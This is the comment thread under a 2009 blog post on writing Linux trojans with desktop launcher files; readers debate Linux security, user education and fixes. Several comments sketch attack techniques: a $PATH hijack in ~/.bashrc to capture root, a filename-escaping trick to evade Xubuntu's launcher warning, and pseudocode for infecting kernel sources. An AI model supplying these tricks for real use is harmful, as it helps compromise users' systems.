Alas tho, I'm not here to fuel flames, but to praise; The notion of getting root access thought modifying the user-editable menu-entry files for su/sudo-requiring apps is brilliant. I mean, It's utterly simple, but it's just nothing most people -think- of. Usually when talking about getting root, one thinks of privilege escalation exploits in the kernel, but that's it.

And while the old rule of not wildly opening e-mail attachments is ancient and old news by itself, I'm glad you stated the fact that, yes, Linux users also need to live by it.

One big reason:

While on the one hand, most Linux users are tech-savvy and security-aware...people seem forget that those users also often -eagerly- try to push the benefits of Linux onto their family members and friends. 'hey, this is alot more secure than your Windows, use it! I'll install it for you, too!'

Boom. There you have it. Linux users who are not in the least the OS experts and security-aware folks that many people claim a Linux user clearly is. And we'll be seeing more of this in the future. That's something to think about folks... Mr. LinuxExpert installing fave-distro for others as a gift. You know, because their Windows was so worm-ridden ever so often.


Thanks for the article.


Comment by hazed, on 19-Feb-2009 03:16

Dammit, thanks for taking away one of my leading arguments when getting windows users to migrate to Linux!

Nevertheless, it was very informative, and definitely something to keep in mind when dealing with GUI's of any sort, on any sort of operating system.


Comment by Alex Borges, on 19-Feb-2009 06:00

K man, all you say is true.

But come on:

1) Wanna get rid of your "virus"? Delete all dot-files in the home directory, recreate from /etc/skel.

2) Did de "box" get infected? No, it didnt, only the home directory of the user did.

3) Do you need an antivirus to protect or remove the thing? No, all you need is a little technical prowess.

4) No operating system experience can survive the user tendency to execute something that goes randomly in their inbox. None at all. Or well, only those that do not let you execute anything except verified and signed code, such as the iphone and other celphones. While we may enjoy this lack of feature in a phone, no PC would be worth it if you couldnt use it as a generic platform.

5) It all depends.... on the visual filemanager's configuratiopn. Mine wont run anything without asking me if I want to look at a terminal screen or not. Thats two times it asked: once in my email client, once when attempting to run.

So yes, you can make a trojan for linux (for anything, really, even a pwned iphone). Its just cheaper to kill and its harder for it to infect you.

On the other side, no linux user should feel confortable with a script ariving at his/her box. Linux gets its software from a recognized distributor, not from any kind of email. Linux users so tend to be much more weary of anything that will attempt to run on their box, since anything that has to "run", comes from a little icon on the top left, for most distros.

You are right, though, in that nobody should say that Linux is impervious. It is not. Its just MUCH MUCH MUCH more secure.


Comment by martinob, on 19-Feb-2009 06:50

Hi,

This is an interesting article. It reminds me of an Ubuntu thread I read a couple of years ago about a hypotetical fake-sudo exploit.

http://ubuntuforums.org/showthread.php?t=504740

How about the following suggestions for users:

1) Never open anything by left-clicking on it; always do it by right-clicking and selecting action from the context menu.

2) To avoid privilege escalation: don't use su or sudo from the same virtual terminal of your regular user. In my case, I've configured my system so that two x-sessions are opened by default. One of them (under F7) is for my regular user, and the other one (under F8) is for a privileged user, from where I use sudo or su for programs like synaptic. I use a lightweight WM (iceWM)for this privileged account, so that the system is not so loaded. In other words, I work under the assumption (I think it's correct) that virtual terminals are a hard wall against all forms of keylogging. Why bother? Well, for instance, you may have a hard-disk backup policy in which backups can only be deleted by root. So, if the trojan only gets your user account, it can delete your working files but not your backups.

Now, for DE developers:

Always give the user visual cues as to whether a file is to be opened with a low-risk application (like gimp, firefox or openoffice) or a high-risk program like an interpreter (bash, perl, python,..). Here the risk criterion is as follows: "is it normal, expected behavior that opening a file with this program may result in arbitrary manipulation of other files by the program?" If the answer is affirmative, the program is an interpreter, and the file icon should reflect this fact (either by only allowing one or few, easily recognisable icons for this type of file, or by surrounding the icon with an indicator halo, or something like that ) or the DE should prompt the user for confirmation upon left-clicking. Yes, openoffice (with macros) and firefox (with javascript) are becoming a grey area, where some files are not so safe as they should, but this risk is properly assessed and addressed by developers of those programs. In contrast, general-purpose interpreters are meant to execute code without restrictions. The long-term solution would be, I think, a capability-based security model.. but in the meantime, this rough distinction between interpreters and everything else should remain a priority.


Comment by Tempura, on 19-Feb-2009 21:34

Besides dumping desktop-files in ~/.local/share/applications, there is a more useful way to gain root-access. Just modify $PATH in ~/.bashrc and dump some wrapper-scripts for the usual apps somewhere. This way, it's a nearly 100%-chance that you gain root-access when the user use root the next time. This works, becaus most of the desktop-files don't use the full path to applications. And so does the user itself, too.


Comment by themouse, on 20-Feb-2009 03:21

I tell everyone that that virus/trojan are unlikely on Linux. And what I tell them is the individuals who have the skill in that environment are usually writing kernal or some other code.

Windows on the other hand is a closed door, red button who can resist...


Comment by Scali, on 20-Feb-2009 04:13

Hi, I liked your article, but there is a small error in there.

Windows actually DOES have an execute bit in the filesystem. At least, it does on NTFS partitions.

You have the following basic permissions:

- Full Control
- Modify
- Read & Execute
- Read
- Write


All these are ACL-driven and as such can be inherited and you can set allow/deny rights for any group or person you like.

This makes it possible to have .exe files that can be read and written to by a user, but not executed, just like on a *nix system.

The main problem here is that on most Windows systems, the execute right is enabled at the root of the drive, and then automatically inherited, which will still allow people to run executables.

This is however the result of a system that is not properly configured by the administrator, and not a deficit of the OS itself, as the article claims.


Comment by Hilzu, on 24-Feb-2009 11:21

Interesting. According to this: http://commit-digest.org/issues/2009-02-08/ the problem described here is actually being fixed in KDE and Gnome.


Comment by erikro, on 26-Feb-2009 03:43

Hi,

that's amusing. I'm using Linux now for more than 10 years and from time to time I read that viruses are as possible under that system as under windows. I just googled a bit around for another of those discussions to have a look what's going on at the moment. Business as usual. We hear two mantras. The linux mantra of the stupid ppl who tell us that linux is not vulnerable and the paid by ms mantra that it is vulnerable as windows and we don't have viruses here cause it isn't used as much as windows. Both are wrong.

First of all the argument that viruses are not found under linux cause it is not that widespreaded as windows isn't an argument. This is true when we are talking about desktop systems but what about server installations which are much more interesting for crackers than my grandmas computer? Here we find much more installations under linux and other unixes that windows. Where is the malware found?

Second, for about ten years now the ms paid ppl tell me that in the next time we will find a load of linux virus. I'm waiting and waiting and nothing happens. The viruses we know are not spreaded. Only some laboratory viruses exist. For example in 2006 Kaspersky which is for sure one of the world wide leading virus experts told us so. Now, three years later, he repeats it. How many new viruses where found the last three years widespreaded in the wild? Under windows nearly uncountable, under linux none. So what?

Third, everone who really knows system architecture of both systems also knows that windows is much more vulnerable than linux. Not only the concept of making files executable not by it's name but by an executable bit, not only the user concept but also the concept how hardware drivers can be added makes linux harder than windows. That doesn't mean that linux can't be attacked. One who says so is just stupid. It's just not that easy and we need other methods to do so.

The easiest method is and that's what you are talking about the social attack. Why looking around for an exploit if I can tell the user to execute the file. In that case the user concept protects the system from the worst case giving the attacker root access. Is it so? Is linux really better in that case? No it isn't and that's the point of your article.

I'm also running windows even for longer time than linux. I never installed a virus scanner. I have my virus scanner placed in my brain. Ok, that's not the way everyone should act and the last years I'm using windows only for testing and educational purpose and not for surfing, email ... The most important point is that I know how to make windows as rock hard in that point as linux. It is possible even though it costs you a lot of work. The lack in the user concept of windows is not the architecture but how it is used. We all know that the first user made whilst installation process has full admin rights and ppl are even not told that this is dangerous. So the non technical users don't even know which risk they are running and what to do against it. In the home editions they don't even have the chance to make the change. That's what makes windows installations that vulerable.

Linux is better than this? Let's take a look at the actual distributions. I'm not only administrating systems but also teaching how to do so. Doing so you have a much closer view on what is strange. So, I installed with my pupils the newest opensuse. I was a bit shocked when we created the first user:

- user password the same as root password activated
- user logged in automatically activated

Hey, that's like windows! For sure I told my pupils to deactivate this but will new non technical users who downloaded opensuse to give it a try do so? They don't under windows and they won't under linux. So they will have a great lack of security which is not needed.

Other distros I've been told (I think it was a fork of ubuntu) use only sudo to give users root access. Sudo is a nice thing for server administration to let the email admin configure only email purpose, the web admin only apache etc. but for desktop systems it is not really needed. It's only easier for the user not giving always the root password but just typing sudo. I was told that there are distros who don't even have a root password but everything has to be done with sudo even without being promted for password. So we can use your method to run everything we want with root rights on those systems.

That's what's going on. The modern distros want to make linux that "easy" as windows seems to be. That's the wrong way. Linux in my point of view was always easier to handle than windows cause the basic installation was as secure as the system could be. Windows is a system which you have to work a lot on to make it secure. So the way should be to keep linux secure and not to make the same mistakes as ms did.

Bye

Erik


Comment by Madman, on 27-Feb-2009 02:11

@Romanic: Yeah, good thing Microsoft is working hard to make UAC more secure...

Part of the reason GNU/Linux is so secure is because of the repository system. Need an application for a specific task? Searh the repositories. 99.9% of the time, your wanted application is there. No need to surf the web, scan downloaded executables with a virus scanner, downloading programs from E-mails, etc. etc. etc.

Granted, as said quite a few times, social security isn't an issue that GNU/Linux can fix. Leave that to education. As was also said before, albeit only once, A fix is being made in both Gnome and KDE.


Comment by passerby, on 28-Feb-2009 04:48

it a very valid point that root privileges are not needed considering that most malware and spy ware is meant to harvest peoples personal information which can be all accessed from a user level account on a unix machine. the internals of the operating system that are protected by root privileges i don't consider to be overly important because if they are compermised i can just do a fresh install of the operating system the data I actually care about on my computer is all contained within the home partition with in my user folder which can all be accessed by this hack or whatever you want to call it.


Comment by ShadowCat8, on 13-Mar-2009 12:37

"Virus", "Trojan Horse", "Worm" and "Malware"...

The media, which is where your average end-user gets their education about computers, has been using these terms almost completely interchangably for nearly as long as there have been consumer-level computers available. Very similar to the way that the term "Hacker" went from it's original definition of "a person who takes someone else's code and changes it to suit their needs" to "someone who tries to bypass the 'front-door' security of a remote system."

Another way to put it might be; "Do you use a PC?"

Well, if you don't have Windoze loaded on it, Micro$loth would have you believe, "No! If it hasn't got our software on it, it's not a PC!" which is complete bull! "PC" stands for Personal Computer and has nothing to do with the OS that is loaded on it (unless you talk to my mother, who has believed that 'PC' stands for 'Profusely Corded' since she first saw my C64 back in the day). But, the media plays along and the commercials run, and now you have 6- and 9-year-old's claiming to be PCs. Ugh! And, the irony completely escapes those people when they see the motto "Life without walls..." and don't realize, "Hey! If I don't have walls, I don't need windows!"

@our host, foobar + erikro

You are correct; Since we are seeing an increase in the end-users that are migrating away from windoze to other OSes, the possibilities of creating security issues within "secure OSes" increases. It falls upon us, the ones who have actually been working in the field and on the code for years, to teach and train them what proper safe computing practices are. And, while the basic concept of "If you don't know who sent you that email with the attachment on it, delete it!" is so obvious to us as to be redundant, keep in mind that to your average end-user, it isn't. Remember that M$ always coded to "the lowest common denominator" and made it easy for *that* user to be able to do what they had to do, despite the security risks. However, if they hadn't done that in the first place, computers in general would not be as widespread as they are now. (The proverbial double-edged sword.)

So, as our friends and family are moving into different OSes like Linux, OS X, etc. it behooves us to teach them how to protect themselves and their systems from those who would do harm. Either spend the 20 minutes with them when they get the new email client installed on how to properly configure it and use it, or spend an entire evening until one in the morning trying to rescue their data after they *did* click on that dangerous attachment when it finally does come. Undoing the dangerous paradigms that M$ has established in the end-users heads with regards to what is considered "good computing" would go a lot further towards system security than having the best AV program loaded on the system, imho. And, to that end, I applaud foobar for putting this and the follow-up posts online!

@EvilPixieMan, et al.

If you are one of those who have an issue with the current usage of the malware terminology, then perhaps it is time to do something about it. If you see a news story incorrectly calling a piece of malware a virus and you know for a fact that it is a worm, correct them. Good journalists really are concerned about accuracy, and will generally print a correction.

Of course, there are those journalists who are only concerned about ratings/readership/$$$/etc.. The only way to change them is to ignore them. If a news service keeps calling a particular trojan a virus, even after correction, then it's time to stop watching/listening/buying from them. The only thing they are looking at is the bottom line, and that is where we have to convince them that it is a bad idea to stretch the truth for their ratings.


Comment by Zwopper, on 29-Mar-2009 01:47

Interesting article, yet another reason to glad about using XFCE. LXDE and a slew of other! :)


Comment by Niun, on 29-Mar-2009 07:44

hi,

what about mounting the home partition (and the /tmp dir) with the noexec option?

A developer or someone who wants to run scripts without root rights (call him scriptguy) would have to create a directory outside the home partition (with root rights) where only scriptguy has write permissions.

This way a normal user is not able to run downloaded code. If he knows the root passwort and knows, howto setup the script directory, he is hopfully too smart to click on these faked office documents.


Comment by Tony, on 7-Apr-2009 20:19

That would sound suspicious to most of us, but 'most' is not 'all' and user stupidity is everywhere.

Great little article but i take exception to the above statement.

Some including myself might not be computer literate or have had the opportunities to be so...uneducated might have been a better word coming from someone like your good educated self.

I will leave you on my farm for a season and if you go broke because you haven't done it before i wont call you stupid now would i?.


Author's note by foobar, on 8-Apr-2009 06:59

@Tony: Thank you for your comment. I accept your point about 'user stupidity'. The phrasing there is not the best one. As a matter of fact, I very much agree with your sentiment. You might want to take a look at these two articles here, which I wrote about just that subject a few months ago here and here. Calling users stupid for making mistakes like that are counter productive and don't help anyone.

If you look at the virus article, you find that four paragraphs above the place from where you quoted, I wrote:

    However, there is nothing fundamental about the architecture of
    Linux that prevents user stupidity or ignorance, which is of course
    the main ingredient in any attack vector like this.


I talk about 'stupidity' (for example, ignoring warning messages after being warned or educated about it) and 'ignorance' (just not knowing any better). These two things are of course different.

The latter ('ignorance') can happen to all of us. The word is often laden with a very negative image, but it is quite clear that most of us are ignorant about most things around us. I know that: See my two articles to which I linked above.

In the paragraph from which you quoted I condensed it down to a compact phrase in order to make the point succinctly. I should have been more careful and added the word 'ignorance' back in there.

P.S. No need to risk your farm in my hands, I know ahead of time that I wouldn't do very well there... :-)


Comment by Tony, on 8-Apr-2009 09:08

Thank you for your awesome reply...Your two articles cleared the air for me...thanks and btw i really am impressed with your computer knowledge that's why i read your stuff.


Comment by Steve Hanov, on 12-Apr-2009 13:50

Xubuntu seems to flag a file as potential malware if it looks like it has a file extension other than ".desktop". It's easily defeated by appending a space to the file, for example,

Name=some_text.odt\

Unfortunately for malware writers, this requires two versions of the launcher, since the method above only works in XFCE. Xubuntu allows the escaped spaces, but Gnome requires a backslash-s for the same effect and will display the backslash otherwise.


Comment by penguin007, on 19-Jun-2009 16:21

Interesting article, despite all the noisy comments. One MAJOR attack vector on any OS is the interpreted languages. Whilst feeble (because that's what they are) AV software can try and stop executables, the scripting languages (like Python) cannot be stopped that way. The point is that Python itself (cpython, the interpreter) is of course "trusted". Whatever Python code I write for the interpreter to run, will run; even if I use os.system(-- cmds here --). So all I really need to do is ask the user nicely via gksudo for his root password, and bam! All over. Even worse: if the user has associated .py files with Python, then double clicking them will simply run them.

Once you get the user to click on anything it's game over. And I am afraid that with more n00bs starting to play with Linux this is going to become a real threat.

(And by the way: the launcher attack described above can be launched from any directory, not just the Desktop. Gnome give a feeble warning message, but if you click "Launch Anyway" it's all over.)


Comment by bambambox, on 18-Jul-2009 01:30

Aww man, I wish I'd found this blog before. I posted pretty much the exact same description of a root exploit on the Ubuntu Forums and subsequently got banhammered for spreading FUD. I only wanted to know if it was a feasible exploit. Well, it seems my suspicions were confirmed. It isn't a virus, per se, just the old trojan horse tactic. Hard to spread those on Linux, as most users are clued up on this sort of thing. But, you never know.


Comment by cloudscream, on 3-Sep-2009 05:34

I find this article (and your comments) very useful and educating. Thanks!
How do you forward this article to one of the Gnome or KDE's devs? Have you ever thought of contributing or joining to their team?


Comment by DJ Shaji, on 3-Nov-2009 15:15

What is this, Seinfeld ? Much Ado about Nothing ?

The entire premise of this long ( and really uninteresting ) debate is that a user downloads an e-mail attachment to his desktop, and then "double clicks" it. I haven't double clicked anything in a long time. Like any other simple Linux user, I use the shell -> bash( tty, xterm, gnome-terminal )

This isn't a virus - a trojan, a worm, or really anything at all. The user is simply telling the system what to do! If you click on a "launcher" you're the friggin' idiot who's responsible. It is expected behavior. What the hell is the matter with you ? Can't you simply right lick the file, open it in a text editor before you choose to execute it? You got it from the damn internet. We all know how insecure that can be. And, with all due respect, how can a ".desktop" file have nude shots of anything? I mean, it's a damn text file! Anybody who's spent a day or two with Linux would know that text files usually do not contain multimedia content. You obviously have too much free time.

By the way, how come you're writing python and bash scripts here to "make a virus in five easy steps" ? Why can't you simply write C code and then mail that binary as an attachment? Wouldn't that be a better alternative? Use a statically linked binary and you're done! Where do you come off writing two line python scripts and then declaring that Linux in unsafe and unsecure ?

Also, I saw here somebody saying that the NT model is secure. Yeah, right. Tell that to my friend who runs XP + torrent and then formats his system every other day because he got infected.

Peace out.


Comment by softraider, on 12-Nov-2009 20:55

Too many "complicity" from the user. No one malware can be effective this way (fortunately). In fact, the only danger is the user's stupidity .


Comment by LucasXIIHK, on 24-Nov-2009 20:44

softraider, the user's stupidity is the worst virus in all the operative sistems, not only in Linux. In Windows the "complicity" of the user is vital to execute a virus too.


Comment by jutso, on 20-Jan-2010 04:32

Hello Foobar,

I'm an editor of freiesMagazin, a german Linux and Open Source
periodical (http://freiesmagazin.de).

I have a request: May we translate your article "How to write a Linux
virus in 5 easy steps" and publish it under the GNU Free Documentation
License in freiesMagazin?

I'm looking forward to your reply (redaktionATfreies-magazin.de)

Best regards

Thorsten Schmidt


Comment by Jingis Han, on 26-Jan-2010 07:04

Thanx for this article!
I`m not programmer, but in the past I use only my imagination to know that Linux is easy to hack- you explain it good.
I wonder why some people argue with true?
The lie "There are no viruses for Linux" is the worst thing I heard!
This is mainly cause, why the viruses for Linux will increase soon!
There are no any good and free antywirus for Linux!
I tried to install some - I can`t install any of it - only clamav I can install successfully.
Sorry for my english...
You are really the first man who discovered sad true about Linux security, and the worse thing is that Linux-users dont want to know that Linux is also damaged by the bad-soft as Windows.
I like Linux and I`m using it every day, but if someone tell me or someone else: "use linux coz there are not viruses and spy for it" I`m crying!


Comment by F, on 13-Feb-2010 06:39

How to write a virus for the Linux ecosystem

All approaches I've read apply closed-source approaches to
virus writing on Linux. They work by manipulating native code
or use half-arsed scripting methods. The way to write a Linux
virus is by embracing open-source. Userland has access to kernel-land's source:

0: are we in kernel-land ? goto 7 : NOP
1: search for kernel source files
2: pick a kernel source file with interesting core functions
3: insert virus source code inside core function(s)
4: compress other parts of the source to compensate change in filesize
5: clean tracks (datestamp & stuff)
6: exit
7: welcome to kernel-land
8: $$$

Since the linux ecosystem is open source, we know where the goodies are.
Since the virus is inherently open source, it's license compliant.

Best wishes,
FD from Ghanda


Comment by Vallaryn, on 16-Feb-2010 01:08

I must agree Gnothi.

Linux and no other OS can be stupid-proof! What you talk about here is merely End-User dumbness puting the whole system in danger.

Sorry if I sound a little arrogant or so, but all what you have done here was to prove, in many terms, that Linux IS virus-proof, because every step here need user interaction...

Yeah, the "virus" here resides in between the keyboard and the chair...


Comment by marc san pedro, on 1-May-2010 18:39

This might be the worst example of a virus i've ever heard. I enjoyed the well informed article but it involves so many assumptions that it's kind of ridiculous. I don't think any knowledgeable user would say linux is 'virus free' more like it's immune system is much better position than that of windows...etc.

We could also say...its easy for a virus to destroy windows if a user logins as 'root' and issues commands like rm -r -f *, etc....

At any rate...point is taken there should be more work on KDE/GNOME to prevent such behavior that you mentioned...i think some of this has already happened.


Comment by poacheR, on 6-Dec-2010 12:04

Hi foobar.

I read your article with great interest.
I was almost disappointed to find out the issues you raised have now been addressed: desktop files now have #!/usr/bin/env xdg-open at the first line, as was suggested, and need to be set as executable to act as launchers. Otherwise, the .desktop suffix becomes visible and the system refuses to launch it, saying it is untrusted.

Your article still comes up as one of the top links in google (in fact it's 2nd below the wikipedia entry on linux malware!) in a "linux virus" search. And it's certainly the most eye-catching in that list :)

Maybe it's time for a small update? :)


Add a comment

Please note: comments that are inappropriate or promotional in nature will be deleted. E-mail addresses are not displayed, but you must enter a valid e-mail address to confirm your comments.

Are you a registered Geekzone user? Login to have the fields below automatically filled in for you and to enable links in comments. If you have (or qualify to have) a Geekzone Blog then your comment will be automatically confirmed and placed in the moderation queue for the blog owner's approval.

Your name:

Your e-mail:

Your webpage:

foobar's profile

 
New Zealand


  • Who I am: Software developer and consultant.
  • What I do: System level programming, Linux/Unix. C, C++, Java, Python, and a long time ago even Assembler.
  • What I like: I'm a big fan of free and open source software. I'm Windows-free, running Ubuntu on my laptop. To a somewhat lesser degree, I also follow the SaaS industry.
  • Where I have been: Here and there, all over the place.




Google Search


Recent posts

Attack on net neutrality right...
Munich already saved millions ...
Iceland's public administratio...
More Apple madness (follow up)...
Apple demonstrates: With great...
Smooth sailing with the Karmic...
Censorship in New Zealand: Wid...
Image roll-over effects withou...
How about: Three strikes and Y...
UK government supports open so...


Top 10

How to write a Linux virus in ...
(11-Feb-2009 06:33, 345405 views)
Follow up: How to write a Linu...
(12-Feb-2009 08:10, 46186 views)
A truly light-weight OS: Writt...
(3-Feb-2009 10:39, 41305 views)
The 'Verified by Visa' fiasco ...
(20-Jun-2008 09:59, 18094 views)
EEE PC with XP is cheaper than...
(9-May-2008 06:50, 18080 views)
11 reasons to switch to Linux...
(4-Feb-2009 09:24, 17420 views)
Would you use Google App Engin...
(8-Apr-2008 20:02, 16255 views)
Censorship in New Zealand: Wid...
(16-Jul-2009 12:11, 15371 views)
Django Plugables: Tons of plug...
(11-Apr-2008 03:24, 15263 views)
Slow file copy bug in Vista: A...
(21-Dec-2007 12:18, 14240 views)